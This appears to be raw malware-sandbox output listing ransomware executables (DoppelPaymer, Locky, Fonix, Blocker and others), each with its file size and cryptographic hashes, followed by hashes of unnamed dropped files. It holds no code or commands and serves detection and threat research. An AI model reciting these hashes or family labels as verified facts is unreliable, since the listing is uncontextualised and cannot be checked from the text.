SHA5122d98e33729d5fa52f507be7689df020b65c9d9068a2397419c202e75daf2cbd5b1ad9631ec18e0661b83624de9a395bd551c1c859fc782bafb3ac079c22579e8
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.DoppelPaymer.vho-8971ac708df78f14e3f21c7094d80616195eb46f912cf6d4e72d5eebf9fac865.exe
Filesize3.6MB
MD5b0ea93fa4769a8ff969b99e5fc119bbf
SHA1cc72958cbd6a4ef7428c348d2e54c8b202940bba
SHA2568971ac708df78f14e3f21c7094d80616195eb46f912cf6d4e72d5eebf9fac865
SHA512d956a9a0a6d61f342a22878af783a4a2295a679b414e9504317dd31ae21f3f3f81a75e28ac280e9bf1e14b5d061700165f4d23f1b9b6eab1a86d93f3ea1946cf
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Encoder.gen-57cc7951edcd2b8d3836e7f700955a9ba490bd416a481b9c86c036a55d256954.exe
Filesize2.4MB
MD536ce779c3ba8dd2f1ae7e4e7d997e3a2
SHA1c01fa70d404d0320c2d029f80745ffa4dd4a6e2c
SHA25657cc7951edcd2b8d3836e7f700955a9ba490bd416a481b9c86c036a55d256954
SHA512f4339e1d808b7b54741cad85140eb580bd356f051d98a89267cb407bd27917ef7caf33bfa1244c1c93f3e1b433b8b23982226279f044e5eece76dabe61081943
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Encoder.vho-bd136b3fde933505cf3740c3800a5007e3a94a2d31f28416b04c212dcb0669b6.exe
Filesize855KB
MD5ca67bd93e0e4bae2b3642a611777e090
SHA18e980959b8f3c71cd0cbdf43582936a2edbf6c1d
SHA256bd136b3fde933505cf3740c3800a5007e3a94a2d31f28416b04c212dcb0669b6
SHA51230e33234f3a71eb17a420013e04e42bc74c976fd5048b325381b61299047395e9766e1f5617b05da2447091b92882bc36b2887590da291787ab3db6967216ba5
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe
Filesize426KB
MD5fa62dee14fd22bd4d7ccab5679ec2cb7
SHA1341e3c92d855376055c4d0d69bd433f7917eb8f1
SHA25665521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414
SHA512a5feb824fab1a11e8ac78f4e8aa08350716bff58c0903c7e95b74e3543039aae24553cc2ad873b9816981ae5f44b18a6ec87d4b6b7078604ba5b4ec876be6959
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe
Filesize89KB
MD5bc8294d27d47ad2b3d6d406c977d3a64
SHA12f0325e0c1f592f31bc01349b1858f16c00bae4b
SHA25670320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81
SHA5124c8864629b3410dd541af69c1449ffed92f854f852b7241eb9e0484c10763658c3dc11f2cc6e94d002c422292e09b7ba026593514cd61d9fab717c0772554298
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Blocker.mexm-ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2.exe
Filesize3.8MB
MD572a0f726c8d8bb03fb0fadec3e19b6f7
SHA1179ffbfe136490945318e7c0b8e1e9383c721c78
SHA256ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2
SHA51225877db50b5bf4d655096b342e5d7cf07e81710219e01c9eac8f53c06af5c6623905d913cf1958fcce9657ba157003ef92667320a27362c2ec4a1154dc4fcaf4
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe
Filesize3.7MB
MD5ab4312698756bbe7b415c6b1e5a5b815
SHA1ef4084dcdfeb31ac294e76d783c5df4f086065c8
SHA256586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835
SHA5127fdf969112274a629b89934e5b7a374068ec76f68b068f6ca114392aa192ac67988643a322a12cffc03db69dc090acb0da2aaec51c5bf64bed958c6630b26cce
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Crypren.ahjz-4ebfdf556994b367b8a5f53c8a2caa968a4b04c1c36ce3f0ba4490db8d5b17cb.exe
Filesize860KB
MD590a8741dd5b105fee6128f31cc593d78
SHA106ee9c92211996e71102e0c4dc8dd920f24de7ce
SHA2564ebfdf556994b367b8a5f53c8a2caa968a4b04c1c36ce3f0ba4490db8d5b17cb
SHA512ef48dbd192827ea6c235e5ad6472f5856a9e0582092b6bd3ce243b579d2751dbd30e18f1d522590b25a1ebbbdc040550d722afed2f2f0be8bcdee54a6e4f6877
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Encoder.ldj-f39fde065966b6ba2baa74c589b9543b623639bebe2c444057d9a85bd4c7fa5f.exe
Filesize121KB
MD50ea1fc5d2b5896ed378910eb48aef3cb
SHA15a45657ff671cdc541271075681c63fc274af79a
SHA256f39fde065966b6ba2baa74c589b9543b623639bebe2c444057d9a85bd4c7fa5f
SHA512403a748a9b3f9b1b79e9bbc2826e77317f354ab99fcd7ca6450e8e4c14ed5ba5451f678abae23698a1dc717aa0e8e9c1eb0e07a4aaf695f1590f62523875b1e3
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Encoder.led-95c6cb345c9e45e2a898ea92458edda33c0c685bc92602f004756ccc0c984f44.exe
Filesize567KB
MD5474e9e13e7bef52c249fcf1bb29b45ee
SHA17b8719a6b485163ad47635e67aed5481998d163f
SHA25695c6cb345c9e45e2a898ea92458edda33c0c685bc92602f004756ccc0c984f44
SHA512e46e1a90a79c56c3211ce3c72ed5913bc67a33e02befc930c30ad245541ab19e381bdf398ca4415349ecb25012f18d69827f87e906fdedd02848c5583b8e9de4
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exe
Filesize3.3MB
MD53180f12e468e4d31d5ec50ca57790595
SHA10b475f4594b6f655906aff80270625086f3c6859
SHA256184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc
SHA5123b96a6d9567f3df0169d8cac90289281ff5d72b5ef84fc58f4e0bcc4b0986283e00f1882e0dbac8a04a292e783b48b957d251b45fab82c8fdc2dd9ac1b68213a
-
C:\Users\Admin\Desktop\00417\UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe
Filesize889KB
MD53abaa3126d911c5c5803ef16492fc32e
SHA1dcb8b3d034e58686156f9b94a01394b5b51b5bd0
SHA25637942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678
SHA512373986b0fac4f8d213adcc43ec7d9ce736b48c36d68c92a71aa4bb77ffe2cc81a10059d48a52aaf5e176e95db0710f8f1f5611daf7705e035a6fca81461cd0f0
-
C:\Users\Admin\Desktop\00417\UDS-Trojan-Ransom.Win32.Gen.vyw-78853ae45dc992cf465f9d101db3649311bbd1d11d60d63d12d5cdf1794c734a.exe
Filesize53KB
MD56254c64fc4f98907b17bd983ac8449b8
SHA12233a62fc59f78de3c432a21fc5e92167eac67c3
SHA25678853ae45dc992cf465f9d101db3649311bbd1d11d60d63d12d5cdf1794c734a
SHA512472b314dae4a491416f6a84e8bf60879fe26b206db91cdbcda2c4d67dd95f3535ddb586d33938bed0e7707cd2c78aa974ff1978b6a09f137163516914f607a5d
-
C:\Users\Admin\Desktop\00417\UDS-Trojan-Ransom.Win32.Locky-6ef270bce6969e01839651ba78e2f9dbfbbfebce95478497e07e9386214b977d.exe
Filesize533KB
MD53a6f4bcc5c25dc8ba23708e6ad34458a
SHA15a404079859f8ddf3ae157673cb84fb957051480
SHA2566ef270bce6969e01839651ba78e2f9dbfbbfebce95478497e07e9386214b977d
SHA512462a9140cc4946baf96d94d2de897774a18be00b9176d84d12435612cc8fe0c88f55c444e4b7cbd95b565f969d0dfaf41d2e721981dd5dd4e8f1abe451bd22b8
-
C:\Users\Admin\Desktop\00417\VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe
Filesize2.6MB
MD5a9042b58136d7628a52d2d5dc6940733
SHA19fe9ead48f94cdd62c65595ce229f159c50a05d1
SHA256c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4
SHA512b49e51de0eb21313e79f5a2dd4d8346b9759d90b0052fee354f515c4af22580dd8e9a1e43f4e7088ed7c7b70b6202d7cf5468698079b08f1c41fd86304ab22f0
-
Filesize
21B
MD5c5f68c3b056d8e5cc260908ce646178e
SHA1a0528175312937541a57098b38f037082ca4332d
SHA256d1126517f5359c8253af16ce18a521e51ede1b07edfe5d3240827be46c573c39
SHA512e90a9a823c9514e43e506b2a120ad19ed078a4a98296953a2a0cec7414846c95996e1b6630abae6cc68bca0914e1cd621b5b4e74413b4724e78ecbddc3d14cd2
-
Filesize
12B
MD57b74b59eb512d0797b7f12bf5176b8c4
SHA11ff3e7eea7883a65abf79353a6039dfcd518f4da
SHA25650c692a2d0e822df720c66654c601a49d1d23bbe0c329624c02a97564a738a27
SHA5123f46b9cddad177a21ba6b52928c739821aa108ab92da4c907a8808689782ce3fa2036381912b267b02c0daabd992f11cde0ea867082d8d336e53d8ec79435a29
-
Filesize
196KB
MD5dac14ba78f2539c4e76dd9cf34e7895f
SHA10c8826c5b3d75964a07a24d6ee1bb84852de6f4a
SHA256871ab14c2846a92459bec12ce0c7fc104064f6d8bde2904c533165aa3e822558
SHA5124e13d1ce0c034813128a1640e169dc3addf4be8933fe691e2831ba5a2e13c87b5faf3ed1af63826b35f24b105545ff57ac0109f776f08aae9aaa7c7185fe8d69
-
Filesize
372KB
MD59f7ef4acc96a31a6a3bd8a7c82dca0e1
SHA18b3aeade69601f3b4849f7b28e8a17734d52036a
SHA2561c43b51a34ffe3cdc66e9d5cc1eecfda2f4f2700438af4de84c5839ee6629dc1
SHA5126fb7b77729c044cc8c232a2005d652f9cec47977ce532ed169c5d496a4cc7597b85145606d1c13830b799547ae61b0caa56e24acdfa52dee37686cc3aaa3dbe6
-
Filesize
304KB
MD5101f3657f07e79da2262343f38b2b541
SHA1972870f6ac693839587c132db9a6ae54d4108529
SHA256dc7f1c405e5bc2d24cd5b2089c8b08578ecea9ef0e6a43816b5404995a41b084
SHA51283bd73b59a208838ac9288b93c042c119c2ef3d17a18f7eba918a286f2b76950ac46c7e36c1c0d106e9617d9649cd3aac8ada5a4cd304fa45c09947438bc0bc6
-
Filesize
264KB
MD55a0ba2071cb6f8ff4f12722062cc93b6
SHA10fa675b00b6483cd369f5e67a0661641ead48c84
SHA256f4af1ea9251faef3e9190ba8d061b8a1299185004189ec6eba24ecf30cbe4d70
SHA51204cb8254e8831a2f85b304f4d9f0de10de2773d53da491aa361a5c4af758b486d05687f32d94d453fd7b2039dca1fcebbae3937bead2cf87f7ff743ab1bfb570
-
Filesize
155KB
MD52f502d1e7a266dc98c5351039dcc217d
SHA1a5263882e1321141cd7439a09340ca080de38e0f
SHA2563db6859fcb0c823fe04a67ff09737f32737cf1e13729ee3f770a09eca6717c08
SHA5124d284bf4f9a31f634b67d0cad648c0b7b82170469613ef0e9a9f87368bbea3c282243321b8e174ad2c18a69ce6e596464f02894e4f0801efddd1efcd8bf0e69d
-
Filesize
320B
MD5159b356359cd43ce4c1cc79086678a87
SHA1ade1d5a519a091e8ef83a95c7cd4226f60c13dbc
SHA2564a2ed23ae0744022f42d6d26028860dfecb1b096bb968b0628dd903389bdbdf4
SHA512955c097044513571b0ef0c725425f748a58497141e199ec646224db370529b4f176f03dc02293a7b0bedbbf1a50922d0dfcbb0abbf6f141a6ec993233e474f64
-
Filesize
5B
MD561b02d6cfd8607d3882db39eb6816e5b
SHA1024a55907bbc83848958623c55fccb232f6f187e
SHA2567aea98868421cd519e4079a3b2cbf8e89f7e4402117b6120e0acbaf990ac9dc7
SHA51201cc1f138fd333e32799f3fa70211f9a0220b90e3ddc29c78dbcc344d8fd1d80df3a9f376dc6babcda9e818bedcc65c4be8f6f84b4b7f5ab04a7274c00e20fa6
-
Filesize
739B
MD50e37dbcf36d055642195c83d10bb623e
SHA16bd7caa5d773973d6098be57c8969cf7852e5d34
SHA25603ece571ab70f054c0bc5b46c6770428d77ac48d33d961e9fb3b2affc59cd924
SHA51278f38ed86dc091a38547ed87f606663a1e9a5ef4ff4707a09c9055d2e19fd0edbe94d1983cfb5cb35cb59033eb923021909d1b8ae88b24048c34ea7e687052a9
-
Filesize
1KB
MD5f792a5950de3456a9f3de4a823705dfb
SHA1c3f371ef29c28dfd234e9d5acb6771d3e9226f71
SHA2567b558166a0695a7463dc346a12a1988f5a41ed1b1c1fb55f28de57af47460cee
SHA512b95785e9c8eae0f9b9176afe5a68a230de39837b6463f36f1ad6f1719636fe20d7c51dea2813dfef230c5b4cedda10c19ba06edd1e8fe94e03e1fefc4de04763
-
\??\c:\users\admin\desktop\00417\trojan-ransom.win32.gen.zlq-6968672454eb2109222c6461c218a6152e51a606b15cc9133e014718c99b8949.exe
Filesize122KB
MD52728c13c450a6df9f8aad01beddf5b4a
SHA133594bca37fef541a4344d2b1a02626def3880df
SHA2566968672454eb2109222c6461c218a6152e51a606b15cc9133e014718c99b8949
SHA5122d512e32eefa2d135253baa2b077cd6ef22a4c215088a7ebe1ea4f4585ee5fa021e31cfa3867a2506471ddc1f927814b5c31b3f23ef96e2b341bceb8c91f96e2